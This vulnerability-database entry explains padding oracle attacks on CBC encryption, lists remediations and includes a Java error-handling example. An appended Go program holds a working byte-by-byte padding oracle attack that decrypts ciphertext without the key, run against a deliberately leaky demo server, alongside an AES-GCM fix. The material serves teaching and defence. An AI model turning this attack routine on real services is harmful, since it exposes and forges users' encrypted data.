Padding oracle attack - Vulnerability Database

Padding oracle attack

Description

Manual confirmation is required for this alert.

This application may be vulnerable to a padding oracle attack, a cryptographic side channel affecting CBC-mode encryption with PKCS#5/PKCS#7 padding. The vulnerability occurs when an application reveals whether a decrypted ciphertext had valid padding, for example through a distinct error message, HTTP status code or response time. An attacker who can submit modified ciphertexts and observe that difference can decrypt the data one byte at a time, with at most 256 requests per byte, without ever learning the key. The same oracle also lets the attacker construct ciphertexts that decrypt to plaintext of their choosing, so both the confidentiality and the integrity of the encrypted data are lost.

Remediation

Implement the following measures to prevent padding oracle attacks:

1. Use Authenticated Encryption: Replace CBC-mode encryption with an authenticated encryption mode such as AES-GCM (Galois/Counter Mode), or use an encrypt-then-MAC construction. The receiver verifies the authentication tag before it examines any padding, so a modified ciphertext is rejected outright and there is nothing left for an oracle to reveal.

2. Implement Uniform Error Handling: Ensure that all decryption errors (invalid padding, MAC verification failures, malformed length, etc.) return the same error message and HTTP status code and take the same amount of time to process. Never distinguish between padding errors and other decryption failures in responses or logs that the client can observe.

3. Apply Constant-Time Operations: Use constant-time comparison functions and ensure decryption operations complete in consistent time regardless of padding validity.

4. Validate MAC Before Decryption: If using encrypt-then-MAC, verify the MAC with a constant-time comparison before attempting decryption and reject invalid messages immediately with the same generic error used for every other failure. Avoid MAC-then-encrypt, which forces the receiver to strip the padding before it can verify the MAC; that ordering is exactly what a padding oracle needs.

Example of uniform error handling in Java. Catching every failure in one handler closes the error-message channel only; the timing channel is closed by the MAC-before-decrypt design in steps 3 and 4:

import javax.crypto.Cipher;
import java.security.GeneralSecurityException;

// One handler for every decryption failure: BadPaddingException,
// IllegalBlockSizeException and AEADBadTagException all extend
// GeneralSecurityException, so the client sees the same response for each.
try {
    byte[] decrypted = cipher.doFinal(ciphertext);
    // Process decrypted data
} catch (GeneralSecurityException e) {
    // Log error internally without details (no exception message or stack trace)
    logger.warn("Decryption failed");
    // Return generic error to client
    throw new SecurityException("Invalid request");
}

5. Consider Modern Alternatives: Migrate to modern cryptographic libraries and protocols (such as TLS 1.3, libsodium, or NaCl) that provide secure defaults and built-in protection against padding oracle attacks.
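A complete worked example of the attack described above and of the step 1 remediation, added here and not part of Invicti's alert text, in Go using only the standard library: a CBC server that leaks padding validity, the byte-by-byte attack that recovers the plaintext from that leak alone, and the AES-GCM replacement that rejects any forged ciphertext with one generic error. The key, IV, nonce and message are constructed demo values, and the function names (vulnerableOracle, paddingOracleAttack, sealGCM, openGCM) are this example's own.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"errors"
	"fmt"
)

const bs = aes.BlockSize
var key = []byte("0123456789abcdef") // constructed demo key; load from a secret store in practice

func pkcs7Pad(b []byte) []byte {
	p := bs - len(b)%bs
	return append(append([]byte{}, b...), bytes.Repeat([]byte{byte(p)}, p)...)
}

// pkcs7Unpad fails on malformed padding; that failure is what a padding oracle leaks.
func pkcs7Unpad(b []byte) ([]byte, error) {
	n, p := len(b), 0
	if n > 0 && n%bs == 0 {
		p = int(b[n-1])
	}
	if p == 0 || p > bs || !bytes.Equal(b[n-p:], bytes.Repeat([]byte{byte(p)}, p)) {
		return nil, errors.New("bad padding")
	}
	return b[:n-p], nil
}

// encryptCBC returns iv||ciphertext with no integrity protection: the flawed design.
func encryptCBC(key, iv, plaintext []byte) []byte {
	block, _ := aes.NewCipher(key)
	padded := pkcs7Pad(plaintext)
	out := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, padded)
	return append(append([]byte{}, iv...), out...)
}

// vulnerableOracle models a server whose response reveals whether the decrypted
// ciphertext had valid padding; a distinct error, status code or timing is enough.
func vulnerableOracle(key, iv, ct []byte) bool {
	block, _ := aes.NewCipher(key)
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	_, err := pkcs7Unpad(pt)
	return err == nil
}

// paddingOracleAttack recovers the padded plaintext of iv||ct from the oracle alone.
// Each block is attacked right-to-left by sending it behind a forged preceding block.
func paddingOracleAttack(data []byte, oracle func(iv, ct []byte) bool) []byte {
	var recovered []byte
	for b := bs; b+bs <= len(data); b += bs {
		prev, cur := data[b-bs:b], data[b:b+bs]
		inter := make([]byte, bs) // D_k(cur), learned one byte at a time
		for i := bs - 1; i >= 0; i-- {
			pad := byte(bs - i)
			forged := make([]byte, bs)
			for j := i + 1; j < bs; j++ {
				forged[j] = inter[j] ^ pad // already-known bytes are forced to decrypt to pad
			}
			for g := 0; g < 256; g++ {
				forged[i] = byte(g)
				if !oracle(forged, cur) {
					continue
				}
				if i == bs-1 { // last byte: rule out a longer valid padding such as 02 02
					alt := append([]byte{}, forged...)
					alt[i-1] ^= 0xff
					if !oracle(alt, cur) {
						continue
					}
				}
				inter[i] = byte(g) ^ pad
				break
			}
		}
		for k := range inter {
			recovered = append(recovered, inter[k]^prev[k])
		}
	}
	return recovered
}

// sealGCM and openGCM are the step 1 remediation: AES-GCM authenticates the ciphertext,
// so any modified block fails the tag check and every failure maps to one generic error.
func sealGCM(key, nonce, plaintext []byte) []byte {
	block, _ := aes.NewCipher(key)
	g, _ := cipher.NewGCM(block)
	return g.Seal(nil, nonce, plaintext, nil) // 12-byte nonce, unique per key
}

func openGCM(key, nonce, ct []byte) ([]byte, error) {
	block, _ := aes.NewCipher(key)
	g, _ := cipher.NewGCM(block)
	pt, err := g.Open(nil, nonce, ct, nil)
	if err != nil {
		return nil, errors.New("invalid request") // same error for tag, length or any other failure
	}
	return pt, nil
}

func main() {
	ct := encryptCBC(key, []byte("fedcba9876543210"), []byte("attack at dawn; session=42")) // constructed IV and message
	fmt.Printf("recovered without the key: %q\n",
		paddingOracleAttack(ct, func(iv, c []byte) bool { return vulnerableOracle(key, iv, c) }))
}
```

Run with go run: the program prints the message followed by its six 0x06 padding bytes, recovered purely from the oracle's true/false answers. The attack needs at most 256 queries per byte (plus one disambiguating query for the final byte of each block), so even a timing difference of a few microseconds becomes exploitable once an attacker can average many requests. Against openGCM the same forged blocks all produce the identical "invalid request" error, which is the property the remediation list is after.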

Related Vulnerabilities